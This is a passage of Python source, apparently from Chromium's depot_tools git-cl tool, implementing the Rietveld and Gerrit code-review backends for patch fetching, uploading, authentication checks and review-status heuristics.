raise NotImplementedError()
def CloseIssue(self):
"""Closes the issue."""
raise NotImplementedError()
def GetApprovingReviewers(self):
"""Returns a list of reviewers approving the change.
Note: not necessarily committers.
"""
raise NotImplementedError()
def GetMostRecentPatchset(self):
"""Returns the most recent patchset number from the codereview site."""
raise NotImplementedError()
def CMDPatchWithParsedIssue(self, parsed_issue_arg, reject, nocommit,
directory):
"""Fetches and applies the issue.
Arguments:
parsed_issue_arg: instance of _ParsedIssueNumberArgument.
reject: if True, reject the failed patch instead of switching to 3-way
merge. Rietveld only.
nocommit: do not commit the patch, thus leave the tree dirty. Rietveld
only.
directory: switch to directory before applying the patch. Rietveld only.
"""
raise NotImplementedError()
@staticmethod
def ParseIssueURL(parsed_url):
"""Parses url and returns instance of _ParsedIssueNumberArgument or None if
failed."""
raise NotImplementedError()
def EnsureAuthenticated(self, force):
"""Best effort check that user is authenticated with codereview server.
Arguments:
force: whether to skip confirmation questions.
"""
raise NotImplementedError()
def CMDUploadChange(self, options, args, change):
"""Uploads a change to codereview."""
raise NotImplementedError()
def SetCQState(self, new_state):
"""Update the CQ state for latest patchset.
Issue must have been already uploaded and known.
"""
raise NotImplementedError()
class _RietveldChangelistImpl(_ChangelistCodereviewBase):
def __init__(self, changelist, auth_config=None, rietveld_server=None):
super(_RietveldChangelistImpl, self).__init__(changelist)
assert settings, 'must be initialized in _ChangelistCodereviewBase'
settings.GetDefaultServerUrl()
self._rietveld_server = rietveld_server
self._auth_config = auth_config
self._props = None
self._rpc_server = None
def GetCodereviewServer(self):
if not self._rietveld_server:
# If we're on a branch then get the server potentially associated
# with that branch.
if self.GetIssue():
rietveld_server_setting = self.GetCodereviewServerSetting()
if rietveld_server_setting:
self._rietveld_server = gclient_utils.UpgradeToHttps(RunGit(
['config', rietveld_server_setting], error_ok=True).strip())
if not self._rietveld_server:
self._rietveld_server = settings.GetDefaultServerUrl()
return self._rietveld_server
def EnsureAuthenticated(self, force):
"""Best effort check that user is authenticated with Rietveld server."""
if self._auth_config.use_oauth2:
authenticator = auth.get_authenticator_for_host(
self.GetCodereviewServer(), self._auth_config)
if not authenticator.has_cached_credentials():
raise auth.LoginRequiredError(self.GetCodereviewServer())
def FetchDescription(self):
issue = self.GetIssue()
assert issue
try:
return self.RpcServer().get_description(issue).strip()
except urllib2.HTTPError as e:
if e.code == 404:
DieWithError(
('\nWhile fetching the description for issue %d, received a '
'404 (not found)\n'
'error. It is likely that you deleted this '
'issue on the server. If this is the\n'
'case, please run\n\n'
' git cl issue 0\n\n'
'to clear the association with the deleted issue. Then run '
'this command again.') % issue)
else:
DieWithError(
'\nFailed to fetch issue description. HTTP error %d' % e.code)
except urllib2.URLError as e:
print('Warning: Failed to retrieve CL description due to network '
'failure.', file=sys.stderr)
return ''
def GetMostRecentPatchset(self):
return self.GetIssueProperties()['patchsets'][-1]
def GetPatchSetDiff(self, issue, patchset):
return self.RpcServer().get(
'/download/issue%s_%s.diff' % (issue, patchset))
def GetIssueProperties(self):
if self._props is None:
issue = self.GetIssue()
if not issue:
self._props = {}
else:
self._props = self.RpcServer().get_issue_properties(issue, True)
return self._props
def GetApprovingReviewers(self):
return get_approving_reviewers(self.GetIssueProperties())
def AddComment(self, message):
return self.RpcServer().add_comment(self.GetIssue(), message)
def GetStatus(self):
"""Apply a rough heuristic to give a simple summary of an issue's review
or CQ status, assuming adherence to a common workflow.
Returns None if no issue for this branch, or one of the following keywords:
* 'error' - error from review tool (including deleted issues)
* 'unsent' - not sent for review
* 'waiting' - waiting for review
* 'reply' - waiting for owner to reply to review
* 'lgtm' - LGTM from at least one approved reviewer
* 'commit' - in the commit queue
* 'closed' - closed
"""
if not self.GetIssue():
return None
try:
props = self.GetIssueProperties()
except urllib2.HTTPError:
return 'error'
if props.get('closed'):
# Issue is closed.
return 'closed'
if props.get('commit') and not props.get('cq_dry_run', False):
# Issue is in the commit queue.
return 'commit'
try:
reviewers = self.GetApprovingReviewers()
except urllib2.HTTPError:
return 'error'
if reviewers:
# Was LGTM'ed.
return 'lgtm'
messages = props.get('messages') or []
# Skip CQ messages that don't require owner's action.
while messages and messages[-1]['sender'] == COMMIT_BOT_EMAIL:
if 'Dry run:' in messages[-1]['text']:
messages.pop()
elif 'The CQ bit was unchecked' in messages[-1]['text']:
# This message always follows prior messages from CQ,
# so skip this too.
messages.pop()
else:
# This is probably a CQ messages warranting user attention.
break
if not messages:
# No message was sent.
return 'unsent'
if messages[-1]['sender'] != props.get('owner_email'):
# Non-LGTM reply from non-owner and not CQ bot.
return 'reply'
return 'waiting'
def UpdateDescriptionRemote(self, description):
return self.RpcServer().update_description(
self.GetIssue(), self.description)
def CloseIssue(self):
return self.RpcServer().close_issue(self.GetIssue())
def SetFlag(self, flag, value):
"""Patchset must match."""
if not self.GetPatchset():
DieWithError('The patchset needs to match. Send another patchset.')
try:
return self.RpcServer().set_flag(
self.GetIssue(), self.GetPatchset(), flag, value)
except urllib2.HTTPError as e:
if e.code == 404:
DieWithError('The issue %s doesn\'t exist.' % self.GetIssue())
if e.code == 403:
DieWithError(
('Access denied to issue %s. Maybe the patchset %s doesn\'t '
'match?') % (self.GetIssue(), self.GetPatchset()))
raise
def RpcServer(self):
"""Returns an upload.RpcServer() to access this review's rietveld instance.
"""
if not self._rpc_server:
self._rpc_server = rietveld.CachingRietveld(
self.GetCodereviewServer(),
self._auth_config or auth.make_auth_config())
return self._rpc_server
@classmethod
def IssueSettingSuffix(cls):
return 'rietveldissue'
def PatchsetSetting(self):
"""Return the git setting that stores this change's most recent patchset."""
return 'branch.%s.rietveldpatchset' % self.GetBranch()
def GetCodereviewServerSetting(self):
"""Returns the git setting that stores this change's rietveld server."""
branch = self.GetBranch()
if branch:
return 'branch.%s.rietveldserver' % branch
return None
def _PostUnsetIssueProperties(self):
"""Which branch-specific properties to erase when unsetting issue."""
return ['rietveldserver']
def GetRieveldObjForPresubmit(self):
return self.RpcServer()
def SetCQState(self, new_state):
props = self.GetIssueProperties()
if props.get('private'):
DieWithError('Cannot set-commit on private issue')
if new_state == _CQState.COMMIT:
self.SetFlag('commit', '1')
elif new_state == _CQState.NONE:
self.SetFlag('commit', '0')
else:
raise NotImplementedError()
def CMDPatchWithParsedIssue(self, parsed_issue_arg, reject, nocommit,
directory):
# TODO(maruel): Use apply_issue.py
# PatchIssue should never be called with a dirty tree. It is up to the
# caller to check this, but just in case we assert here since the
# consequences of the caller not checking this could be dire.
assert(not git_common.is_dirty_git_tree('apply'))
assert(parsed_issue_arg.valid)
self._changelist.issue = parsed_issue_arg.issue
if parsed_issue_arg.hostname:
self._rietveld_server = 'https://%s' % parsed_issue_arg.hostname
if (isinstance(parsed_issue_arg, _RietveldParsedIssueNumberArgument) and
parsed_issue_arg.patch_url):
assert parsed_issue_arg.patchset
patchset = parsed_issue_arg.patchset
patch_data = urllib2.urlopen(parsed_issue_arg.patch_url).read()
else:
patchset = parsed_issue_arg.patchset or self.GetMostRecentPatchset()
patch_data = self.GetPatchSetDiff(self.GetIssue(), patchset)
# Switch up to the top-level directory, if necessary, in preparation for
# applying the patch.
top = settings.GetRelativeRoot()
if top:
os.chdir(top)
# Git patches have a/ at the beginning of source paths. We strip that out
# with a sed script rather than the -p flag to patch so we can feed either
# Git or svn-style patches into the same apply command.
# re.sub() should be used but flags=re.MULTILINE is only in python 2.7.
try:
patch_data = subprocess2.check_output(
['sed', '-e', 's|^--- a/|--- |; s|^+++ b/|+++ |'], stdin=patch_data)
except subprocess2.CalledProcessError:
DieWithError('Git patch mungling failed.')
logging.info(patch_data)
# We use "git apply" to apply the patch instead of "patch" so that we can
# pick up file adds.
# The --index flag means: also insert into the index (so we catch adds).
cmd = ['git', 'apply', '--index', '-p0']
if directory:
cmd.extend(('--directory', directory))
if reject:
cmd.append('--reject')
elif IsGitVersionAtLeast('1.7.12'):
cmd.append('--3way')
try:
subprocess2.check_call(cmd, env=GetNoGitPagerEnv(),
stdin=patch_data, stdout=subprocess2.VOID)
except subprocess2.CalledProcessError:
print('Failed to apply the patch')
return 1
# If we had an issue, commit the current state and register the issue.
if not nocommit:
RunGit(['commit', '-m', (self.GetDescription() + '\n\n' +
'patch from issue %(i)s at patchset '
'%(p)s (http://crrev.com/%(i)s#ps%(p)s)'
% {'i': self.GetIssue(), 'p': patchset})])
self.SetIssue(self.GetIssue())
self.SetPatchset(patchset)
print('Committed patch locally.')
else:
print('Patch applied to index.')
return 0
@staticmethod
def ParseIssueURL(parsed_url):
if not parsed_url.scheme or not parsed_url.scheme.startswith('http'):
return None
# Typical url: https://domain/<issue_number>[/[other]]
match = re.match('/(\d+)(/.*)?$', parsed_url.path)
if match:
return _RietveldParsedIssueNumberArgument(
issue=int(match.group(1)),
hostname=parsed_url.netloc)
# Rietveld patch: https://domain/download/issue<number>_<patchset>.diff
match = re.match(r'/download/issue(\d+)_(\d+).diff$', parsed_url.path)
if match:
return _RietveldParsedIssueNumberArgument(
issue=int(match.group(1)),
patchset=int(match.group(2)),
hostname=parsed_url.netloc,
patch_url=gclient_utils.UpgradeToHttps(parsed_url.geturl()))
return None
def CMDUploadChange(self, options, args, change):
"""Upload the patch to Rietveld."""
upload_args = ['--assume_yes'] # Don't ask about untracked files.
upload_args.extend(['--server', self.GetCodereviewServer()])
upload_args.extend(auth.auth_config_to_command_options(self._auth_config))
if options.emulate_svn_auto_props:
upload_args.append('--emulate_svn_auto_props')
change_desc = None
if options.email is not None:
upload_args.extend(['--email', options.email])
if self.GetIssue():
if options.title:
upload_args.extend(['--title', options.title])
if options.message:
upload_args.extend(['--message', options.message])
upload_args.extend(['--issue', str(self.GetIssue())])
print('This branch is associated with issue %s. '
'Adding patch to that issue.' % self.GetIssue())
else:
if options.title:
upload_args.extend(['--title', options.title])
message = (options.title or options.message or
CreateDescriptionFromLog(args))
change_desc = ChangeDescription(message)
if options.reviewers or options.tbr_owners:
change_desc.update_reviewers(options.reviewers,
options.tbr_owners,
change)
if not options.force:
change_desc.prompt()
if not change_desc.description:
print('Description is empty; aborting.')
return 1
upload_args.extend(['--message', change_desc.description])
if change_desc.get_reviewers():
upload_args.append('--reviewers=%s' % ','.join(
change_desc.get_reviewers()))
if options.send_mail:
if not change_desc.get_reviewers():
DieWithError("Must specify reviewers to send email.")
upload_args.append('--send_mail')
# We check this before applying rietveld.private assuming that in
# rietveld.cc only addresses which we can send private CLs to are listed
# if rietveld.private is set, and so we should ignore rietveld.cc only
# when --private is specified explicitly on the command line.
if options.private:
logging.warn('rietveld.cc is ignored since private flag is specified. '
'You need to review and add them manually if necessary.')
cc = self.GetCCListWithoutDefault()
else:
cc = self.GetCCList()
cc = ','.join(filter(None, (cc, ','.join(options.cc))))
if cc:
upload_args.extend(['--cc', cc])
if options.private or settings.GetDefaultPrivateFlag() == "True":
upload_args.append('--private')
upload_args.extend(['--git_similarity', str(options.similarity)])
if not options.find_copies:
upload_args.extend(['--git_no_find_copies'])
# Include the upstream repo's URL in the change -- this is useful for
# projects that have their source spread across multiple repos.
remote_url = self.GetGitBaseUrlFromConfig()
if not remote_url:
if settings.GetIsGitSvn():
remote_url = self.GetGitSvnRemoteUrl()
else:
if self.GetRemoteUrl() and '/' in self.GetUpstreamBranch():
remote_url = '%s@%s' % (self.GetRemoteUrl(),
self.GetUpstreamBranch().split('/')[-1])
if remote_url:
upload_args.extend(['--base_url', remote_url])
remote, remote_branch = self.GetRemoteBranch()
target_ref = GetTargetRef(remote, remote_branch, options.target_branch,
settings.GetPendingRefPrefix())
if target_ref:
upload_args.extend(['--target_ref', target_ref])
# Look for dependent patchsets. See crbug.com/480453 for more details.
remote, upstream_branch = self.FetchUpstreamTuple(self.GetBranch())
upstream_branch = ShortBranchName(upstream_branch)
if remote is '.':
# A local branch is being tracked.
local_branch = upstream_branch
if settings.GetIsSkipDependencyUpload(local_branch):
print()
print('Skipping dependency patchset upload because git config '
'branch.%s.skip-deps-uploads is set to True.' % local_branch)
print()
else:
auth_config = auth.extract_auth_config_from_options(options)
branch_cl = Changelist(branchref='refs/heads/'+local_branch,
auth_config=auth_config)
branch_cl_issue_url = branch_cl.GetIssueURL()
branch_cl_issue = branch_cl.GetIssue()
branch_cl_patchset = branch_cl.GetPatchset()
if branch_cl_issue_url and branch_cl_issue and branch_cl_patchset:
upload_args.extend(
['--depends_on_patchset', '%s:%s' % (
branch_cl_issue, branch_cl_patchset)])
print(
'\n'
'The current branch (%s) is tracking a local branch (%s) with '
'an associated CL.\n'
'Adding %s/#ps%s as a dependency patchset.\n'
'\n' % (self.GetBranch(), local_branch, branch_cl_issue_url,
branch_cl_patchset))
project = settings.GetProject()
if project:
upload_args.extend(['--project', project])
if options.cq_dry_run:
upload_args.extend(['--cq_dry_run'])
try:
upload_args = ['upload'] + upload_args + args
logging.info('upload.RealMain(%s)', upload_args)
issue, patchset = upload.RealMain(upload_args)
issue = int(issue)
patchset = int(patchset)
except KeyboardInterrupt:
sys.exit(1)
except:
# If we got an exception after the user typed a description for their
# change, back up the description before re-raising.
if change_desc:
backup_path = os.path.expanduser(DESCRIPTION_BACKUP_FILE)
print('\nGot exception while uploading -- saving description to %s\n' %
backup_path)
backup_file = open(backup_path, 'w')
backup_file.write(change_desc.description)
backup_file.close()
raise
if not self.GetIssue():
self.SetIssue(issue)
self.SetPatchset(patchset)
if options.use_commit_queue:
self.SetCQState(_CQState.COMMIT)
return 0
class _GerritChangelistImpl(_ChangelistCodereviewBase):
def __init__(self, changelist, auth_config=None):
# auth_config is Rietveld thing, kept here to preserve interface only.
super(_GerritChangelistImpl, self).__init__(changelist)
self._change_id = None
# Lazily cached values.
self._gerrit_server = None # e.g. https://chromium-review.googlesource.com
self._gerrit_host = None # e.g. chromium-review.googlesource.com
def _GetGerritHost(self):
# Lazy load of configs.
self.GetCodereviewServer()
if self._gerrit_host and '.' not in self._gerrit_host:
# Abbreviated domain like "chromium" instead of chromium.googlesource.com.
# This happens for internal stuff http://crbug.com/614312.
parsed = urlparse.urlparse(self.GetRemoteUrl())
if parsed.scheme == 'sso':
print('WARNING: using non https URLs for remote is likely broken\n'
' Your current remote is: %s' % self.GetRemoteUrl())
self._gerrit_host = '%s.googlesource.com' % self._gerrit_host
self._gerrit_server = 'https://%s' % self._gerrit_host
return self._gerrit_host
def _GetGitHost(self):
"""Returns git host to be used when uploading change to Gerrit."""
return urlparse.urlparse(self.GetRemoteUrl()).netloc
def GetCodereviewServer(self):
if not self._gerrit_server:
# If we're on a branch then get the server potentially associated
# with that branch.
if self.GetIssue():
gerrit_server_setting = self.GetCodereviewServerSetting()
if gerrit_server_setting:
self._gerrit_server = RunGit(['config', gerrit_server_setting],
error_ok=True).strip()
if self._gerrit_server:
self._gerrit_host = urlparse.urlparse(self._gerrit_server).netloc
if not self._gerrit_server:
# We assume repo to be hosted on Gerrit, and hence Gerrit server
# has "-review" suffix for lowest level subdomain.
parts = self._GetGitHost().split('.')
parts[0] = parts[0] + '-review'
self._gerrit_host = '.'.join(parts)
self._gerrit_server = 'https://%s' % self._gerrit_host
return self._gerrit_server
@classmethod
def IssueSettingSuffix(cls):
return 'gerritissue'
def EnsureAuthenticated(self, force):
"""Best effort check that user is authenticated with Gerrit server."""
if settings.GetGerritSkipEnsureAuthenticated():
# For projects with unusual authentication schemes.
# See http://crbug.com/603378.
return
# Lazy-loader to identify Gerrit and Git hosts.
if gerrit_util.GceAuthenticator.is_gce():
return
self.GetCodereviewServer()
git_host = self._GetGitHost()
assert self._gerrit_server and self._gerrit_host
cookie_auth = gerrit_util.CookiesAuthenticator()
gerrit_auth = cookie_auth.get_auth_header(self._gerrit_host)
git_auth = cookie_auth.get_auth_header(git_host)
if gerrit_auth and git_auth:
if gerrit_auth == git_auth:
return
print((
'WARNING: you have different credentials for Gerrit and git hosts.\n'
' Check your %s or %s file for credentials of hosts:\n'
' %s\n'
' %s\n'
' %s') %
(cookie_auth.get_gitcookies_path(), cookie_auth.get_netrc_path(),
git_host, self._gerrit_host,
cookie_auth.get_new_password_message(git_host)))
if not force:
ask_for_data('If you know what you are doing, press Enter to continue, '
'Ctrl+C to abort.')
return
else:
missing = (
[] if gerrit_auth else [self._gerrit_host] +
[] if git_auth else [git_host])
DieWithError('Credentials for the following hosts are required:\n'
' %s\n'
'These are read from %s (or legacy %s)\n'
'%s' % (
'\n '.join(missing),
cookie_auth.get_gitcookies_path(),
cookie_auth.get_netrc_path(),
cookie_auth.get_new_password_message(git_host)))
def PatchsetSetting(self):
"""Return the git setting that stores this change's most recent patchset."""
return 'branch.%s.gerritpatchset' % self.GetBranch()
def GetCodereviewServerSetting(self):
"""Returns the git setting that stores this change's Gerrit server."""
branch = self.GetBranch()
if branch:
return 'branch.%s.gerritserver' % branch
return None
def _PostUnsetIssueProperties(self):
"""Which branch-specific properties to erase when unsetting issue."""
return [
'gerritserver',
'gerritsquashhash',
]
def GetRieveldObjForPresubmit(self):
class ThisIsNotRietveldIssue(object):
def __nonzero__(self):
# This is a hack to make presubmit_support think that rietveld is not
# defined, yet still ensure that calls directly result in a decent
# exception message below.
return False
def __getattr__(self, attr):
print(
'You aren\'t using Rietveld at the moment, but Gerrit.\n'
'Using Rietveld in your PRESUBMIT scripts won\'t work.\n'
'Please, either change your PRESUBIT to not use rietveld_obj.%s,\n'
'or use Rietveld for codereview.\n'
'See also http://crbug.com/579160.' % attr)
raise NotImplementedError()
return ThisIsNotRietveldIssue()
def GetGerritObjForPresubmit(self):
return presubmit_support.GerritAccessor(self._GetGerritHost())
def GetStatus(self):
"""Apply a rough heuristic to give a simple summary of an issue's review
or CQ status, assuming adherence to a common workflow.
Returns None if no issue for this branch, or one of the following keywords:
* 'error' - error from review tool (including deleted issues)
* 'unsent' - no reviewers added
* 'waiting' - waiting for review
* 'reply' - waiting for owner to reply to review
* 'not lgtm' - Code-Review -2 from at least one approved reviewer
* 'lgtm' - Code-Review +2 from at least one approved reviewer
* 'commit' - in the commit queue
* 'closed' - abandoned
"""
if not self.GetIssue():
return None
try:
data = self._GetChangeDetail(['DETAILED_LABELS', 'CURRENT_REVISION'])
except httplib.HTTPException:
return 'error'
if data['status'] in ('ABANDONED', 'MERGED'):
return 'closed'
cq_label = data['labels'].get('Commit-Queue', {})
if cq_label:
# Vote value is a stringified integer, which we expect from 0 to 2.
vote_value = cq_label.get('value', '0')
vote_text = cq_label.get('values', {}).get(vote_value, '')
if vote_text.lower() == 'commit':
return 'commit'
lgtm_label = data['labels'].get('Code-Review', {})
if lgtm_label:
if 'rejected' in lgtm_label:
return 'not lgtm'
if 'approved' in lgtm_label:
return 'lgtm'
if not data.get('reviewers', {}).get('REVIEWER', []):
return 'unsent'
messages = data.get('messages', [])
if messages:
owner = data['owner'].get('_account_id')
last_message_author = messages[-1].get('author', {}).get('_account_id')
if owner != last_message_author:
# Some reply from non-owner.
return 'reply'
return 'waiting'
def GetMostRecentPatchset(self):
data = self._GetChangeDetail(['CURRENT_REVISION'])
return data['revisions'][data['current_revision']]['_number']
def FetchDescription(self):
data = self._GetChangeDetail(['CURRENT_REVISION'])
current_rev = data['current_revision']
url = data['revisions'][current_rev]['fetch']['http']['url']
return gerrit_util.GetChangeDescriptionFromGitiles(url, current_rev)
def UpdateDescriptionRemote(self, description):
gerrit_util.SetCommitMessage(self._GetGerritHost(), self.GetIssue(),
description)
def CloseIssue(self):
gerrit_util.AbandonChange(self._GetGerritHost(), self.GetIssue(), msg='')
def GetApprovingReviewers(self):
"""Returns a list of reviewers approving the change.
Note: not necessarily committers.
"""
raise NotImplementedError()
def SubmitIssue(self, wait_for_merge=True):
gerrit_util.SubmitChange(self._GetGerritHost(), self.GetIssue(),
wait_for_merge=wait_for_merge)
def _GetChangeDetail(self, options=None, issue=None):
options = options or []
issue = issue or self.GetIssue()
assert issue, 'issue required to query Gerrit'
return gerrit_util.GetChangeDetail(self._GetGerritHost(), str(issue),
options)
def CMDLand(self, force, bypass_hooks, verbose):
if git_common.is_dirty_git_tree('land'):
return 1
detail = self._GetChangeDetail(['CURRENT_REVISION', 'LABELS'])
if u'Commit-Queue' in detail.get('labels', {}):
if not force:
ask_for_data('\nIt seems this repository has a Commit Queue, '
'which can test and land changes for you. '
'Are you sure you wish to bypass it?\n'
'Press Enter to continue, Ctrl+C to abort.')
differs = True
last_upload = RunGit(['config',
'branch.%s.gerritsquashhash' % self.GetBranch()],
error_ok=True).strip()
# Note: git diff outputs nothing if there is no diff.
if not last_upload or RunGit(['diff', last_upload]).strip():
print('WARNING: some changes from local branch haven\'t been uploaded')
else:
if detail['current_revision'] == last_upload:
differs = False
else:
print('WARNING: local branch contents differ from latest uploaded '
'patchset')
if differs:
if not force:
ask_for_data(
'Do you want to submit latest Gerrit patchset and bypass hooks?')
print('WARNING: bypassing hooks and submitting latest uploaded patchset')
elif not bypass_hooks:
hook_results = self.RunHook(
committing=True,
may_prompt=not force,
verbose=verbose,
change=self.GetChange(self.GetCommonAncestorWithUpstream(), None))
if not hook_results.should_continue():
return 1
self.SubmitIssue(wait_for_merge=True)
print('Issue %s has been submitted.' % self.GetIssueURL())
return 0
def CMDPatchWithParsedIssue(self, parsed_issue_arg, reject, nocommit,
directory):
assert not reject
assert not nocommit
assert not directory
assert parsed_issue_arg.valid
self._changelist.issue = parsed_issue_arg.issue
if parsed_issue_arg.hostname:
self._gerrit_host = parsed_issue_arg.hostname
self._gerrit_server = 'https://%s' % self._gerrit_host
detail = self._GetChangeDetail(['ALL_REVISIONS'])
if not parsed_issue_arg.patchset:
# Use current revision by default.
revision_info = detail['revisions'][detail['current_revision']]
patchset = int(revision_info['_number'])
else:
patchset = parsed_issue_arg.patchset
for revision_info in detail['revisions'].itervalues():
if int(revision_info['_number']) == parsed_issue_arg.patchset:
break
else:
DieWithError('Couldn\'t find patchset %i in issue %i' %
(parsed_issue_arg.patchset, self.GetIssue()))
fetch_info = revision_info['fetch']['http']
RunGit(['fetch', fetch_info['url'], fetch_info['ref']])
RunGit(['cherry-pick', 'FETCH_HEAD'])
self.SetIssue(self.GetIssue())
self.SetPatchset(patchset)
print('Committed patch for issue %i pathset %i locally' %
(self.GetIssue(), self.GetPatchset()))
return 0
@staticmethod
def ParseIssueURL(parsed_url):
if not parsed_url.scheme or not parsed_url.scheme.startswith('http'):
return None
# Gerrit's new UI is https://domain/c/<issue_number>[/[patchset]]
# But current GWT UI is https://domain/#/c/<issue_number>[/[patchset]]
# Short urls like https://domain/<issue_number> can be used, but don't allow
# specifying the patchset (you'd 404), but we allow that here.
if parsed_url.path == '/':
part = parsed_url.fragment
else:
part = parsed_url.path
match = re.match('(/c)?/(\d+)(/(\d+)?/?)?$', part)
if match:
return _ParsedIssueNumberArgument(
issue=int(match.group(2)),
patchset=int(match.group(4)) if match.group(4) else None,
hostname=parsed_url.netloc)
return None
def _GerritCommitMsgHookCheck(self, offer_removal):
hook = os.path.join(settings.GetRoot(), '.git', 'hooks', 'commit-msg')
if not os.path.exists(hook):
return
# Crude attempt to distinguish Gerrit Codereview hook from potentially
# custom developer made one.
data = gclient_utils.FileRead(hook)
if not('From Gerrit Code Review' in data and 'add_ChangeId()' in data):
return
print('Warning: you have Gerrit commit-msg hook installed.\n'
'It is not neccessary for uploading with git cl in squash mode, '
'and may interfere with it in subtle ways.\n'
'We recommend you remove the commit-msg hook.')
if offer_removal:
reply = ask_for_data('Do you want to remove it now? [Yes/No]')
if reply.lower().startswith('y'):
gclient_utils.rm_file_or_tree(hook)
print('Gerrit commit-msg hook removed.')
else:
print('OK, will keep Gerrit commit-msg hook in place.')
def CMDUploadChange(self, options, args, change):
"""Upload the current branch to Gerrit."""
if options.squash and options.no_squash:
DieWithError('Can only use one of --squash or --no-squash')
if not options.squash and not options.no_squash:
# Load default for user, repo, squash=true, in this order.
options.squash = settings.GetSquashGerritUploads()
elif options.no_squash:
options.squash = False
# We assume the remote called "origin" is the one we want.
# It is probably not worthwhile to support different workflows.
gerrit_remote = 'origin'
remote, remote_branch = self.GetRemoteBranch()
branch = GetTargetRef(remote, remote_branch, options.target_branch,
pending_prefix='')
if options.squash:
self._GerritCommitMsgHookCheck(offer_removal=not options.force)
if not self.GetIssue():
# TODO(tandrii): deperecate this after 2016Q2. Backwards compatibility
# with shadow branch, which used to contain change-id for a given
# branch, using which we can fetch actual issue number and set it as the
# property of the branch, which is the new way.
message = RunGitSilent([
'show', '--format=%B', '-s',
'refs/heads/git_cl_uploads/%s' % self.GetBranch()])
if message:
change_ids = git_footers.get_footer_change_id(message.strip())
if change_ids and len(change_ids) == 1:
details = self._GetChangeDetail(issue=change_ids[0])
if details:
print('WARNING: found old upload in branch git_cl_uploads/%s '
'corresponding to issue %s' %
(self.GetBranch(), details['_number']))
self.SetIssue(details['_number'])
if not self.GetIssue():
DieWithError(
'\n' # For readability of the blob below.
'Found old upload in branch git_cl_uploads/%s, '
'but failed to find corresponding Gerrit issue.\n'
'If you know the issue number, set it manually first:\n'
' git cl issue 123456\n'
'If you intended to upload this CL as new issue, '
'just delete or rename the old upload branch:\n'
' git rename-branch git_cl_uploads/%s old_upload-%s\n'
'After that, please run git cl upload again.' %
tuple([self.GetBranch()] * 3))
# End of backwards compatability.
if self.GetIssue():
# Try to get the message from a previous upload.
message = self.GetDescription()
if not message:
DieWithError(
'failed to fetch description from current Gerrit issue %d\n'
'%s' % (self.GetIssue(), self.GetIssueURL()))
change_id = self._GetChangeDetail()['change_id']
while True:
footer_change_ids = git_footers.get_footer_change_id(message)
if footer_change_ids == [change_id]:
break
if not footer_change_ids:
message = git_footers.add_footer_change_id(message, change_id)
print('WARNING: appended missing Change-Id to issue description')
continue
# There is already a valid footer but with different or several ids.
# Doing this automatically is non-trivial as we don't want to lose
# existing other footers, yet we want to append just 1 desired
# Change-Id. Thus, just create a new footer, but let user verify the
# new description.
message = '%s\n\nChange-Id: %s' % (message, change_id)
print(
'WARNING: issue %s has Change-Id footer(s):\n'
' %s\n'
'but issue has Change-Id %s, according to Gerrit.\n'
'Please, check the proposed correction to the description, '
'and edit it if necessary but keep the "Change-Id: %s" footer\n'
% (self.GetIssue(), '\n '.join(footer_change_ids), change_id,
change_id))
ask_for_data('Press enter to edit now, Ctrl+C to abort')
if not options.force:
change_desc = ChangeDescription(message)
change_desc.prompt()
message = change_desc.description
if not message:
DieWithError("Description is empty. Aborting...")
# Continue the while loop.
# Sanity check of this code - we should end up with proper message
# footer.
assert [change_id] == git_footers.get_footer_change_id(message)
change_desc = ChangeDescription(message)
else:
change_desc = ChangeDescription(
options.message or CreateDescriptionFromLog(args))
if not options.force:
change_desc.prompt()
if not change_desc.description:
DieWithError("Description is empty. Aborting...")
message = change_desc.description
change_ids = git_footers.get_footer_change_id(message)
if len(change_ids) > 1:
DieWithError('too many Change-Id footers, at most 1 allowed.')
if not change_ids:
# Generate the Change-Id automatically.
message = git_footers.add_footer_change_id(
message, GenerateGerritChangeId(message))
change_desc.set_description(message)
change_ids = git_footers.get_footer_change_id(message)
assert len(change_ids) == 1
change_id = change_ids[0]
remote, upstream_branch = self.FetchUpstreamTuple(self.GetBranch())
if remote is '.':
# If our upstream branch is local, we base our squashed commit on its
# squashed version.
upstream_branch_name = scm.GIT.ShortBranchName(upstream_branch)
# Check the squashed hash of the parent.
parent = RunGit(['config',
'branch.%s.gerritsquashhash' % upstream_branch_name],
error_ok=True).strip()
# Verify that the upstream branch has been uploaded too, otherwise
# Gerrit will create additional CLs when uploading.
if not parent or (RunGitSilent(['rev-parse', upstream_branch + ':']) !=
RunGitSilent(['rev-parse', parent + ':'])):
# TODO(tandrii): remove "old depot_tools" part on April 12, 2016.
DieWithError(
'Upload upstream branch %s first.\n'
'Note: maybe you\'ve uploaded it with --no-squash or with an old '
'version of depot_tools. If so, then re-upload it with:\n'
' git cl upload --squash\n' % upstream_branch_name)
else:
parent = self.GetCommonAncestorWithUpstream()
tree = RunGit(['rev-parse', 'HEAD:']).strip()
ref_to_push = RunGit(['commit-tree', tree, '-p', parent,
'-m', message]).strip()
else:
change_desc = ChangeDescription(
options.message or CreateDescriptionFromLog(args))
if not change_desc.description:
DieWithError("Description is empty. Aborting...")
if not git_footers.get_footer_change_id(change_desc.description):
DownloadGerritHook(False)
change_desc.set_description(self._AddChangeIdToCommitMessage(options,
args))
ref_to_push = 'HEAD'
parent = '%s/%s' % (gerrit_remote, branch)
change_id = git_footers.get_footer_change_id(change_desc.description)[0]
assert change_desc
commits = RunGitSilent(['rev-list', '%s..%s' % (parent,
ref_to_push)]).splitlines()
if len(commits) > 1:
print('WARNING: This will upload %d commits. Run the following command '
'to see which commits will be uploaded: ' % len(commits))
print('git log %s..%s' % (parent, ref_to_push))
print('You can also use `git squash-branch` to squash these into a '
'single commit.')
ask_for_data('About to upload; enter to confirm.')
if options.reviewers or options.tbr_owners:
change_desc.update_reviewers(options.reviewers, options.tbr_owners,
change)
# Extra options that can be specified at push time. Doc:
# https://gerrit-review.googlesource.com/Documentation/user-upload.html
refspec_opts = []
if options.title:
# Per doc, spaces must be converted to underscores, and Gerrit will do the
# reverse on its side.
if '_' in options.title:
print('WARNING: underscores in title will be converted to spaces.')
refspec_opts.append('m=' + options.title.replace(' ', '_'))
if options.send_mail:
if not change_desc.get_reviewers():
DieWithError('Must specify reviewers to send email.')
refspec_opts.append('notify=ALL')
else:
refspec_opts.append('notify=NONE')
cc = self.GetCCList().split(',')
if options.cc:
cc.extend(options.cc)
cc = filter(None, cc)
if cc:
refspec_opts.extend('cc=' + email.strip() for email in cc)
if change_desc.get_reviewers():
refspec_opts.extend('r=' + email.strip()
for email in change_desc.get_reviewers())
refspec_suffix = ''
if refspec_opts:
refspec_suffix = '%' + ','.join(refspec_opts)
assert ' ' not in refspec_suffix, (
'spaces not allowed in refspec: "%s"' % refspec_suffix)
